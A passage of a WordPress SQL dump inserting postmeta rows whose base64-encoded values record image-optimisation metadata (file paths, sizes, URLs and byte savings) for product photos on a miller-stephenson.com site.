WNrdXBcLzIwMTZcLzA5XC9IRUxPWFktMTA3LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyOTUwLCJ0aW1lIjoxNDgzNTUxNzM3LCJpZCI6MTkxNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTA3LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS0xMDctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI2NzcsInRpbWUiOjE0ODM1NTE3NDEsImlkIjoxOTE1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMDctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMTc3MCwidGltZSI6MTQ4MzU1MTc0NSwiaWQiOjE5MTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMDctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktMTA3LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NjgsInRpbWUiOjE0ODM1NTE3NDgsImlkIjoxOTE1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMDctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTA3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTAwLCJ0aW1lIjoxNDgzNTUxNzUxLCJpZCI6MTkxNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTA3LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS0xMDctMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU4MiwidGltZSI6MTQ4MzU1MTc1NSwiaWQiOjE5MTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMDctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktMTA3LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODMzLCJ0aW1lIjoxNDgzNTUxNzU4LCJpZCI6MTkxNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMDctMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTA3LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjE0LCJ0aW1lIjoxNDgzNTUxNzYyLCJpZCI6MTkxNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMDctNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTA3LTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTA5LCJ0aW1lIjoxNDgzNTUxNzY1LCJpZCI6MTkxNX1d'); 
INSERT INTO `wp_postmeta` VALUES (29002, 1914, 'wpfc_optimisation_reduction', '20717'); 
INSERT INTO `wp_postmeta` VALUES (29003, 1914, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTcxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTcxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTE3NjksImlkIjoiMTkxNCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3NzcsInRpbWUiOjE0ODM1NTE3NzMsImlkIjoxOTE0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS03MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS03MS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS03MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjYwNywidGltZSI6MTQ4MzU1MTc3NiwiaWQiOjE5MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyMzE2LCJ0aW1lIjoxNDgzNTUxNzgwLCJpZCI6MTkxNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNzEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNzEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTA2MTAsInRpbWUiOjE0ODM1NTE3ODQsImlkIjoxOTE0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS03MS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS03MS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS03MS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTIxLCJ0aW1lIjoxNDgzNTUxNzg3LCJpZCI6MTkxNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNzEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNzEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNzEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ0NSwidGltZSI6MTQ4MzU1MTc5MSwiaWQiOjE5MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTcxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MDIsInRpbWUiOjE0ODM1NTE3OTQsImlkIjoxOTE0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS03MS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS03MS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS03MS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTQ4NSwidGltZSI6MTQ4MzU1MTc5OCwiaWQiOjE5MTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNzEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNzEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNzEtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjY2MSwidGltZSI6MTQ4MzU1MTgwMSwiaWQiOjE5MTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNzEtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNzEtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNzEtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjc5MywidGltZSI6MTQ4MzU1MTgwNCwiaWQiOjE5MTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29004, 1913, 'wpfc_optimisation_reduction', '8754'); 
INSERT INTO `wp_postmeta` VALUES (29005, 1913, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLmpwZyIsIndpZHRoIjo0NjUwLCJoZWlnaHQiOjMxMDAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTE4MDksImlkIjoiMTkxMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1MTUsInRpbWUiOjE0ODM1NTE4MTMsImlkIjoxOTEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6ODgxLCJ0aW1lIjoxNDgzNTUxODE3LCJpZCI6MTkxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYW5kLWx1YnJpY2FudHMtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYW5kLWx1YnJpY2FudHMtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtYW5kLWx1YnJpY2FudHMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjc3NywidGltZSI6MTQ4MzU1MTgyMSwiaWQiOjE5MTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjMwMDAsInRpbWUiOjE0ODM1NTE4MjYsImlkIjoxOTEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDk3LCJ0aW1lIjoxNDgzNTUxODI5LCJpZCI6MTkxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYW5kLWx1YnJpY2FudHMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYW5kLWx1YnJpY2FudHMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtYW5kLWx1YnJpY2FudHMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQyNywidGltZSI6MTQ4MzU1MTgzMiwiaWQiOjE5MTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWFuZC1sdWJyaWNhbnRzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NDIsInRpbWUiOjE0ODM1NTE4MzYsImlkIjoxOTEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVw